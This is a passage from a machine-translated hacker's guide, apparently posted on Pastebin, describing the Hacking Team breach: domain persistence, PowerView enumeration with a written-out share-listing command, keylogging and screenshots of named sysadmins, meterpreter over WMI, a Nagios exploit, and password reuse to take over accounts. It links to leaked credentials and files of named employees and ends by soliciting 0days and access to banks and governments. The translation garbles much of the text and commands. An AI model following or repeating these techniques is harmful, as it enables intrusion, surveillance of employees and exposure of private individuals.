  746. hack activists or other individuals. Companies to hack, it goes
  747. persistence because companies never sleep. I always use "persistence"
  748. Duqu style 2 run in RAM on a pair of servers with high
  749. uptime percentages. In the unlikely event that all restarted at a time,
  750. I have a ticket passwords and gold [1] to access booking. You can read
  751. more information on persistence mechanisms for windows here
  752. [2. 3. 4]. But to hack into companies, you do not need and increases the risk of
  753. detection.
  754.  
  755. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  756. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  757. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  758. [4] https://blog.netspi.com/tag/persistence/
  759.  
  760.  
  761. ---- [13.3 - Internal Recognition] ---------------------------------------- ---
  762.  
  763. The best tool for understanding today Windows is Powerview networks [1].
  764. Worth reading everything written by the author [2] above all [3], [4], [5] and
  765. [6]. Powershell itself is also very powerful [7]. As there are still many
  766. 2003 and 2000 servers without powershell, you must also learn the old
  767. school [8], with tools like netview.exe [9] or the command windows
  768. "Net view". Other techniques that I like are:
  769.  
  770. 1) Download a list of file names
  771.  
  772.    With a domain administrator account, you can download all
  773.    file names on the network with powerview:
  774.  
  775.    Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ |
  776.    select-string '^ (. *) \ t' | % {$ _ Matches -recurse dir [0] .Groups [1]. |
  777.    select fullname | files.txt -append out-file}
  778.  
  779.    Later, you can read at your own pace and choose which ones you want to download.
  780.  
  781. 2) Read post
  782.  
  783.    As we have seen, you can be downloaded emails with powershell, and have
  784.    lots of useful information.
  785.  
  786. 3) Read sharepoint
  787.  
  788.    It is another place where many companies have important information. It can
  789.    download with powershell [10].
  790.  
  791. 4) Active Directory [11]
  792.  
  793.    It has lots of useful information about users and computers. Without being
  794.    domain administrator, and you can find lots of information
  795.    powerview and other tools [12]. After getting manager
  796.    domain should export all the information of AD with csvde or other
  797.    tool.
  798.  
  799. 5) Spying on employees
  800.  
  801.    One of my favorite pastimes is hunting the sysadmins. spying
  802.    Christan Pozzi (sysadmin Hacking Team) got the server accesso
  803.    Nagios gave me accessibility to sviluppo rete (network development in
  804.    RCS source code). With a simple combination of Get-Keystrokes and
  805.    Get-TimedScreenshot of PowerSploit [13], Do-Exfiltration of Nishang [14], and
  806.    GPO, you can spy on any employee or even the entire domain.
  807.  
  808. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  809. [2] http://www.harmj0y.net/blog/tag/powerview/
  810. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  811. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  812. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  813. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  814. [7] https://adsecurity.org/?p=2535
  815. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  816. [9] https://github.com/mubix/netview
  817. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  818. [11] https://adsecurity.org/?page_id=41
  819. [12] http://www.darkoperator.com/?tag=Active+Directory
  820. [13] https://github.com/PowerShellMafia/PowerSploit
  821. [14] https://github.com/samratashok/nishang
  822.  
  823.  
  824. - [14 - Hunting Sysadmins] ------------------------------------------ ----------
  825.  
  826. By reading the documentation of its infrastructure [1], I realized that even I
  827. lacked access to something important - "Rete Sviluppo" an isolated network
  828. keeps all the RCS source code. Sysadmins of a company always
  829. They have access to everything. I searched computers Mauro Romeo and Christian
  830. Pozzi to see how they handle the network sviluppo, and to see if there were other
  831. interesting systems should investigate. It was easy to access your
  832. computers since they were part of the Windows domain that had
  833. administrator. Mauro computer Romeo had no open port,
  834. so I opened the port of WMI [2] to execute meterpreter [3]. In addition to
  835. record catches with keys and Get-Keystrokes and Get-TimedScreenshot, used many
  836. modules / gather / metasploit, CredMan.ps1 [4], and searched files [5]. seeing
  837. that Pozzi had a Truecrypt volume, I waited until he had assembled to
  838. then copy the files. Many have laughed weak passwords
  839. Christian Pozzi (Christian Pozzi and generally provides enough material
  840. for comedy [6] [7] [8] [9]). I included them in filtration as an oversight and
  841. to laugh at him. The reality is that mimikatz and keyloggers see all
  842. same passwords.
  843.  
  844. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  845. [2] http://www.hammer-software.com/wmigphowto.shtml
  846. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  847. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  848. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  849. [6] http://archive.is/TbaPy
  850. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  851. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  852. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  853.  
  854.  
  855. - [15 - The Bridge] ------------------------------------------ ------------------
  856.  
  857. Within the volume encryption Christian Pozzi, there was a textfile with many
  858. passwords [1]. One was for a Nagios server Fully Automated,
  859. I had access to sviluppo network to monitor it. Had found
  860. the bridge. Only had the password for the Web interface, but there was a
  861. Public exploit [2] to execute code and get a shell (is an exploit
  862. unauthenticated, but it takes a user has logged in to the
  863. I used that password textfile).
  864.  
  865. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  866. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  867.  
  868.  
  869. - [16 - Reusing and restoring passwords] ----------------------------
  870.  
  871. Reading the post, he had seen Milan Daniele granting access to
  872. git repositories. And I had its windows password by mimikatz. The
  873. I tried with git server and it worked. I tried sudo and it worked. For him
  874. gitlab server and your twitter account, I used the "I forgot my
  875. Password "and my access to the mail server to restore
  876. password.
  877.  
  878.  
  879. - [17 - Conclusion] ------------------------------------------- ----------------
  880.  
  881. It is done. So easy it is to tear down a company and stop their abuses
  882. human rights. That is the beauty and the asymmetry of hacking: with only a hundred
  883. hours of work, one person can undo years of work of a
  884. multimillion-dollar company. The hacking gives us the possibility of the dispossessed
  885. fight and win.
  886.  
  887. Hacking guides often end with a warning: This information is
  888. only for educational purposes, I am an ethical hacker, not attacks on computers without
  889. permission, gobbledygook. I will say the same, but with a more rebellious concept
  890. hacking "ethical". Filter ethical hacking documents would expropriate money
  891. banks, and protect computers of ordinary people. However, the
  892. Most people who call themselves "ethical hackers" work only
  893. to protect those who pay their consulting fee, which often are the
  894. they most deserve to be hacked.
  895.  
  896. Hacking Team is see themselves as part of a tradition of inspiring
  897. Italian [1] design. I see them Vincenzetti, your company, and their cronies
  898. police, police, and government, as part of a long tradition of
  899. Italian fascism. I want to dedicate this guide to the victims of the assault on the
  900. Armando Diaz school, and all those who have shed their blood on hands
  901. Italian fascists.
  902.  
  903. [1] https://twitter.com/coracurrier/status/618104723263090688
  904.  
  905.  
  906. - [18 - Contact] ------------------------------------------- ------------------
  907.  
  908. To send spearphishing attempts, death threats written in
  909. Italian [1] [2] and to give me 0days or access within banks,
  910. corporations, governments etc.
  911.  
  912. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  913. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  914.  
  915. porfa only encrypted mails:
  916. https://securityinabox.org/es/thunderbird_usarenigmail
  917. ----- BEGIN PGP PUBLIC KEY BLOCK -----
  918.  
  919. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua + bmF2E7OUihTodv4F / N04KKx
  920. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w / 00JH7UTLcZNbt9WGxtLEs + C + jF9j2g
  921. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy / TcdWA8x
  922. + FCM4OHxM4AwkqqbaAtqUwAJ3Wxr + Hr / 3KV + UNV1lBPlGGVSnV + OA4m8XWaPE73h
  923. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  924. Ms3gckaJ30JnPc / qGSaFqvl4pJbx / CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  925. Y2tiYWNrQHJpc2V1cC5uZXQ + iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  926. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8 + cr3tac
  927. QdqVNDdp6nbP2rVPW + o3DeTNg0R + 87NAlGWPg17VWxsYoa4ZwKHdD / tTNPk0Sldf
  928. CQE + IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  929. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9 + edsudn341oPB + 7LK7l8vj5Pys
  930. 4eauRd / XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh / YiP3MeBzFJX8
  931. // X2NYUOYWm3oxiGQohoAn BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  932. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F / q / HQBYfl4ne3edL2Ai
  933. oHOGg0OMNuhNrs56eLRyB / 6IjM3TCcfn074HL37eDT0Z9p + rbxPDPFOJAMFYyyjm
  934. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6 + x1nXbiW8sqGEH0a / VdCR3 / CY5F
  935. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  936. WlBP72gPyiWQ / fSUuoM + WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9 + 9e4YUo
  937. jYYjoU4ZuX77iM3 + VWW1J1xJujOXJ / sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  938. CRA0nD0R6Kkl0ArYB / 47LnABkz / t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  939. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  940. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh + Gi
  941. JKp0XtOqGF5NH / Zdgz6t vuwWQaubMJTRdMTGhaRv + ++ + Z8U jIzKOiO9YtPNamHRq
  942. Mf2vA3oqf22vgWQbK1MOK / 4Tp6MGg / VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  943. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  944. E5 = + and
  945. ----- END PGP PUBLIC KEY BLOCK -----
  946.  
  947.  
  948.  
  949.                     If not you, who? If not now, when?
  950.                 ____ _ _ _ _ _
  951.                | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
  952.                | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
  953.                | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
  954.                | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top